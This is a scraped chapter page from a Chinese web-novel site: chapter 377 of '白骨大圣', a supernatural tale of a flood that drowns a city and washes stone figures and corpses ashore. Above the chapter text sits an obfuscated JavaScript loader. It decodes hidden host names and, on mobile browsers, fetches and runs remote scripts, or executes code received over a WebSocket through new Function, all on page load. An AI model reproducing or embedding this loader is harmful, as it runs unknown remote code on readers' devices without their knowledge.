笔趣阁

字:
关灯 护眼
笔趣阁 > 白骨大圣 > 第377章 红盖头!最凶狠里面的最凶狠!
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第377章 红盖头!最凶狠里面的最凶狠!

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
福地内。
  
  噗通!
  
  噗通!噗通!
  
  连续三声落水声,晋安三人被神秘力量拖拽进阴水河里。
  
  晋安注意到了阴水河在倒流。
  
  就连老道士身上的罗盘在落水时也跟着一同掉出去,被倒流的阴水河带走,朝地下暗河、朝地宫里流去。
  
  直到这时他才发现,并非是老道士有多么特殊才会被拖拽进福地里,而是老道士身上的那块有缺罗庚玉盘!
  
  这地宫里有东西想要借助罗庚玉盘脱困逃出去!
  
  难道那存在了数千年的人形陵墓真的是“老物件活过来”?还是说玉棺里的那口殃气逃出来了?
  
  民间总说物件越老越容易撞邪,什么稀奇古怪事都能碰到。
  
  但不管是哪个。
  
  晋安都绝不会把这罗盘拱手相让出去。
  
  他直接动用二郎真君敕水符,隔水摄物罗盘,旋即果断利用分水珠破开水面逃命,没有一点犹豫,根本就没要逞能停留原地的打算。
  
  嗥!
  
  那声吓人咆哮再次响起,犹如带着枷锁的厉鬼在挣扎,从地下深处发出沉闷咆哮。
  
  声音凄厉,怨怒,又巨大。
  
  刹那,原本倒流的阴水河如海浪潮汐倒卷,化作滔天洪水巨浪,朝三人怒浪拍天而来。
  
  晋安带着老道士和削剑刚冲破水面,就被外头白雾罩住,眼前白茫茫一片,顿时,三人从原地消失。
  
  ……
  
  ……
  
  武州府,府城。
  
  此时的府城里乱作一团,满城百姓被城外的阴邑江洪水围困,惨叫声,绝望声响彻满城,哀声遍野,浮尸无数。
  
  天上开始下起瓢泼大雨,江里浊浪一个接一个涌上堤岸,雨借风势,风助雨威,天上的疾风骤雨越来越迅猛,浪头一个比一个高,轰隆隆,这一刻暴雨落地似千军万马奔腾,满城百姓被浇了个落汤鸡,屋顶被磅礴大雨砸漏,土墙被狂风吹倒,到处都在惨叫。
  
  轰隆,一声响彻似闷雷在耳畔炸起!
  
  是城门失守了。
  
  千斤重的厚重城门被滔天洪水一下子就拍开。
  
  短时间的暴雨突增,上游洪涝来不及泄走,引发连锁反应的洪涝灾难,裹着大量上游泥浆、原木、沿江村民、牛羊猪马尸体,直接撞开了城门。
  
  洪水倒灌进城,城中百姓的惨嚎声更多了,许多人畜直接被大水带着冲走,多了许多母亲怀抱婴儿、夫妻相拥、儿子托举着老娘尸体的浮尸,惨绝人寰,人间地狱。
  
  这些浮尸里多了不少本应是下山救世济民的和尚、道士尸体。
  
  在全城绝望哭泣中,偶尔一些其它声音,也很快被满城百姓的哭泣淹没,随着城门被洪水冲开,有人发现有一些江水里的东西也跟着一同被冲上岸来,是一个又一个的石俑人。
  
  那些石俑人明明就是石头雕刻的死物,脸上表情不会动,当与它们眼眶里的眼珠子相互注视时,像是看着灵堂死人眼珠子的阴森寒冷感觉,精神恍惚。
  
  河道,街上,家中院落里,开始出现越来越多石俑人。
  
  但除了石俑人外,那些历年来被困在暗无天日千尸洞下的溺死者尸体,那些搁浅在千尸洞深处的尸山,尸堆,也都被洪水冲刷上岸。
  
  民间传言,但凡溺死的人,都会寻找新的替死鬼。每一个死人上岸,都是在寻找替他们受苦去死的替死鬼,只有这样他们才能重新投胎转世。
  
  这些上岸的死人越来越多,是要拉着满城几万百姓,沿江数十万百姓替他们去死。
  
  天色越来越昏暗,有一大团乌云跋来,如黑色鬼云压顶摧城,遮天蔽日。
  
  与此同时,阴邑江上有一大团白雾在快速飘散弥漫,阴邑江就像是打开了鬼门关,洪水滔天肆虐而出。
  
  蓦然!一直平静的五脏道观,传出一个惊呼声:“道观咋被水淹了!”
  
  下一刻,道观后院的厢房屋顶,有两道身影翻身跃上屋顶,满城惨状映入眼底。
  
  壁画预言上的大灾难正在上演,第一幅壁画到第八幅壁画,全被千年前的先人给卜卦中了。
  
  没过大腿高的水面上,漂满了百姓尸体、家畜尸体,有孤零零一个人的稚童坐在木盆里哇哇大哭,哭喊着要找爹娘。
  
  虽然早已有所预料。
  
  可当亲眼目睹这副人间惨状时,晋安两手紧紧攥拳,心头压着块大石,呼吸困难,脸上有愤怒和悲伤。
  
  不久后,观门从里面打开,老道士看着道观外的水淹府城,脸上升起忿忿表情:“造孽,真是造孽啊!”
  
  晋安、老道士、削剑三人淌着腿高的内涝洪水,先是来到道观对面的棺材铺寻找林叔。
  
  棺材铺里一片凌乱,棺材、木柜、香烛黄纸倒了一大片,淹进店里的浑浊黄水上漂浮满各类黄纸、金银纸元宝,污浊不堪,被大水冲倒的木料棺材漂浮在水上把门口和一楼铺子堵得严严实实。
  
  然而,他们找遍了整个棺材铺,都没找到林叔,远不止如此,这条街的街坊邻居也都失踪不见了。
  
  唯一的好消息是,这些人虽然家中被水淹得很乱,但一些细软钱粮都不见了,这说明大家很有可能是有准备的离开,应该是见大水淹城,有人组织起大家逃出城了。
  
  随着时间推移,城内压抑在绝望惨嚎下的一些其它声音,也开始逐渐压不住了,有更多人在惊慌无措的奔逃。
  
  “怎么回事?”
  
  “哪来的那么多惨叫声?”
  
  老道士紧张的抬头看向惨叫声传来方向,但他眼前除了内涝就是民房墙壁,看不到几条街外情况。
  
  晋安反应比老道士快,后者还没开口说话时,他就已经身子敏捷的纵身一跃,轻松跳上棺材铺子的屋顶。
  
  他第一眼就发现到了那些顺着倒塌城门,大量从阴邑江冲进府城的石俑人、千窟洞里的那些沉尸。
  
  普通百姓都被这一幕惊悚吓到。
  
  发生一声接一声的尖叫声。
  
  “小兄弟,你站在上面看到了什么?外面究竟是怎么回事?”老道士站在街上紧张喊道。
  
  就这么会功夫,之前还是在腿高水位线已经快要漫到腰部位置了,按照这个快速长势,用不了一个时辰,全城所有人都要被大水吞噬。
  
  风雨并未大炮晋安身上的五色道袍,就如一位仙人在狂风暴雨中屹立不动,登高望远,气质飘渺又带暴雨中带着一份萧冷肃杀气势,晋安站在屋顶上冷色说道:“是千窟洞里的那些死人全都跑出来了!”
  
  “不止如此,就连地宫里那些石俑人也全都被大水冲出来了!”
  
  老道士闻言惊骇,不可置信的瞪大一双眼:“小,小兄弟,我们都带着罗庚玉盘逃出来了,怎么洞天福地出口还没关闭!这,怎么会这样!”
  
  因为太过吃惊和意外,老道士连说话都结巴了。
  
  洪水上涨速度很快,晋安前这边才刚说完,几条街外的那些石头人、死而不腐的沉尸,就已经被洪水冲到他们所在的这条街道。
  
  “小心!”
  
  离老道士最近的削剑忽然出手了。
  
  “啥?”
  
  老道士还没反应过来,削剑一只手猛的探入浑浊水下,抓碎了一颗死人头颅,然后远远抛飞无头死人。
  
  可削剑杀死一个死人,却有更多死人顺着水流漂浮向这边,它们无法看见活人死相,一身都是尸气的捞尸人削剑,于是全都在浑浊水下漂向老道士脚边。
  
  削剑看到了隐藏在水下的诡谲动静,他抓起老道士衣领,纵身飞跃上屋顶。
  
  但是那些水底下的漂浮死人,并不打算就放过老道士这个替死鬼,水下蹿出数条死人手,爪子锋利的抓向削剑和老道士后背。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师